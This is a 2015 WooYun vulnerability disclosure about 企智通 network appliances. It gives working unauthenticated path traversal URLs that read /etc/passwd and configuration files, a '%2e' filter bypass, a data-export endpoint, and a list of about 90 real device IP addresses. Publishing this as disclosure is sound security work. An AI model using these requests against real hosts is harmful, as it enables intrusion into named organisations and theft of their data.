当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145925

漏洞标题:企智通系列上网行为管理设备存在两处任意文件遍历&敏感信息泄漏(都无需登录)

相关厂商:北京宽广智通信息技术有限公司

漏洞作者: YY-2012

提交时间:2015-10-11 14:20

修复时间:2016-01-12 10:58

公开时间:2016-01-12 10:58

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-11: 细节已通知厂商并且等待厂商处理中
2015-10-14: 厂商已经确认,细节仅向厂商公开
2015-10-17: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-08: 细节向核心白帽子及相关领域专家公开
2015-12-18: 细节向普通白帽子公开
2015-12-28: 细节向实习白帽子公开
2016-01-12: 细节向公众公开

简要描述:

部分设备已经修复过,但只是过滤字符而已。。

详细说明:

http://gd.189.cn/biz/introd/infor/xxaq/2011/10/18/10083.htm
貌似通杀全型号设备:
企智通MINI型 企智通I型 企智通II型 企智通III型 企智通IV型 企智通V型 企智通IX型
(部分设备可通过“%2e”替换“.”即可绕过过滤)第一处任意文件遍历(也可目录遍历):

http://url/test/downTcpdumpFile.jsp?filename=../conf/email.cfg


(部分设备可通过“%2e”替换“.”即可绕过过滤)第二处任意文件遍历(也可目录遍历):

http://url/report/rp_download.jsp?file=/etc/passwd&null=null


敏感信息泄漏(太多了,举例一处,希望举一反三)

http://url/BEAP/user_eqp_batexport.jsp

漏洞证明:

部分存在

zzzzzzzzzzzzzzz111111111111111111111.jpg


zzzzzzzzzzzzzzzzzzz2222222222222222222222.jpg


zzzzzzzzzzzzzzzzz3333333333333333333333.jpg


zzzzzzzzzzzzzzzzzzz444444444444444444444444.jpg


zzzzzzzzzzzzzzzzzzzz55555555555555555555.jpg


部分设备可通过“%2e”替换“.”即可绕过过滤

qqqqqqqqqqqqqqqqqqqqq11111111111111111111111111111.jpg


qqqqqqqqqqqqqqqqqqqqqq222222222222222222222222222.jpg


可目录遍历:

zzzzzzzzzzzzzz666666666666666666666.jpg


zzzzzzzzzzzzzzzz7777777777777777777777.jpg


案例(与wooyun-2015-0139442同样的案例):

http://202.105.31.122:8888/customer.jsp
https://58.60.63.161/customer.jsp
http://116.6.87.76:8888/customer.jsp
http://219.129.23.92:8888/customer.jsp
https://14.18.144.27/customer.jsp
http://183.63.91.226:8888/customer.jsp
http://58.248.137.84:8888/customer.jsp
http://183.63.226.56:8888/customer.jsp
http://183.63.226.56:8888/customer.jsp
https://61.145.196.85/customer.jsp
http://119.146.1.2:8888/customer.jsp
https://183.62.21.51/customer.jsp
http://119.130.114.44:8888/customer.jsp
http://119.130.114.74:8888/customer.jsp
http://125.88.35.170:8888/customer.jsp
http://121.10.222.82:8888/customer.jsp
http://202.105.31.123:8888/customer.jsp
https://183.62.27.21/customer.jsp
https://59.41.254.150/customer.jsp
https://202.105.31.125/customer.jsp
http://219.129.31.170/customer.jsp
http://202.105.31.124:8888/customer.jsp
https://202.105.237.210/customer.jsp
https://183.62.21.50/customer.jsp
http://119.130.114.51:8888/customer.jsp
https://183.62.30.3/customer.jsp
http://202.105.31.126:8888/customer.jsp
http://121.13.250.199:8080/customer.jsp
https://183.62.27.22/customer.jsp
http://59.41.70.194:8888/customer.jsp
http://120.236.48.72/customer.jsp
https://183.63.166.179/customer.jsp
http://183.63.226.62:8888/customer.jsp
http://125.89.68.186/customer.jsp
https://61.145.196.89/customer.jsp
http://119.146.1.2/customer.jsp
http://121.8.187.250:8888/customer.jsp
http://58.252.169.206/customer.jsp
https://113.106.152.98/customer.jsp
http://119.145.67.138:8888/customer.jsp
http://183.63.137.154:8888/customer.jsp
https://61.144.72.202/customer.jsp
http://59.38.32.174:8888/customer.jsp
http://183.63.163.202:8888/customer.jsp
http://183.63.164.34:8888/customer.jsp
http://61.144.72.26:8888/customer.jsp
https://14.23.152.82/customer.jsp
http://125.88.35.187:8888/customer.jsp
https://183.62.27.19/customer.jsp
http://119.130.114.68:8888/customer.jsp
http://113.106.170.74:8888/customer.jsp
https://59.34.231.66/customer.jsp
https://183.62.30.6/customer.jsp
http://183.237.7.233:8888/customer.jsp
http://121.33.227.106:8888/customer.jsp
https://125.90.4.154/customer.jsp
http://113.108.143.186:8888/customer.jsp
http://183.63.91.228:8888/customer.jsp
http://219.132.63.186:8888/customer.jsp
http://119.145.16.200:8888/customer.jsp
http://218.14.208.104:8888/customer.jsp
http://183.63.226.53:8888/customer.jsp
http://183.63.165.50:8888/customer.jsp
https://202.105.237.234/customer.jsp
https://202.105.237.198/customer.jsp
https://202.105.237.194/customer.jsp
https://202.105.31.122/customer.jsp
https://183.62.21.52/customer.jsp
https://183.62.27.18/customer.jsp
https://183.62.27.20/customer.jsp
https://219.129.63.146/customer.jsp
https://113.106.104.242/customer.jsp
http://183.63.137.157:8888/customer.jsp
http://113.105.0.68:8888/customer.jsp
http://113.105.0.66:8888/customer.jsp
https://202.105.31.124/customer.jsp
http://202.105.31.125:8888/customer.jsp
https://183.62.30.2/customer.jsp
https://125.89.236.50/customer.jsp
https://219.132.61.10/customer.jsp
https://112.91.177.210/customer.jsp
https://125.90.0.210/customer.jsp
http://121.33.227.107:8888/customer.jsp
http://1.202.96.16:8888/customer.jsp
https://61.131.61.34/customer.jsp
https://59.61.238.158/customer.jsp
http://183.63.129.106:8888/customer.jsp
https://113.98.123.146/customer.jsp

修复方案:

1.添加权限验证
2.推送补丁不要只推送列出的案例(用户居多应一一推送)

版权声明:转载请注明来源 YY-2012@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-10-14 10:57

厂商回复:

很抱歉刚看到漏洞报告,经测试确认问题存在,正在组织修订和升级方案。

最新状态:

暂无